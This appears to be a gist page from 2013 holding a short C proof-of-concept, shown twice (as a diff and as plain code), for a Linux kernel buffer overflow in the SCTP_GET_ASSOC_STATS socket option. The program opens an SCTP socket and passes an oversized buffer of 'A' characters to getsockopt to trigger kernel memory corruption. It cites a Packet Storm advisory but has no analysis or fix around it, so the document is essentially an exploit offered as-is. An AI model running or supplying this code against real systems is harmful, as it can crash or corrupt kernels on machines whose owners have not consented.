hellok · March 14, 2013 03:54
diff --git a/gistfile1.c b/gistfile1.c
 Linux Kernel SCTP_GET_ASSOC_STATS() Buffer Overflow
 http://packetstormsecurity.com/files/120789/sctpgetassoc-local.txt
 #include <stdio.h>
 #include <string.h>
 #include <netinet/in.h>
 #include <sys/socket.h>
 
 #define SCTP_GET_ASSOC_STATS 112
 #define SOL_SCTP 132
 
 int main(void)
 {
    char *buf = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
    socklen_t len = strlen(buf);
    int fd;
 
    fd = socket(AF_INET, SOCK_STREAM, IPPROTO_SCTP);
    getsockopt(fd, SOL_SCTP, SCTP_GET_ASSOC_STATS, buf, &len);
    return 0;
 }
	Linux Kernel SCTP_GET_ASSOC_STATS() Buffer Overflow
	http://packetstormsecurity.com/files/120789/sctpgetassoc-local.txt
	#include <stdio.h>
	#include <string.h>
	#include <netinet/in.h>
	#include <sys/socket.h>

	#define SCTP_GET_ASSOC_STATS 112
	#define SOL_SCTP 132

	int main(void)
	{
	char *buf = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
	socklen_t len = strlen(buf);
	int fd;

	fd = socket(AF_INET, SOCK_STREAM, IPPROTO_SCTP);
	getsockopt(fd, SOL_SCTP, SCTP_GET_ASSOC_STATS, buf, &len);
	return 0;
	}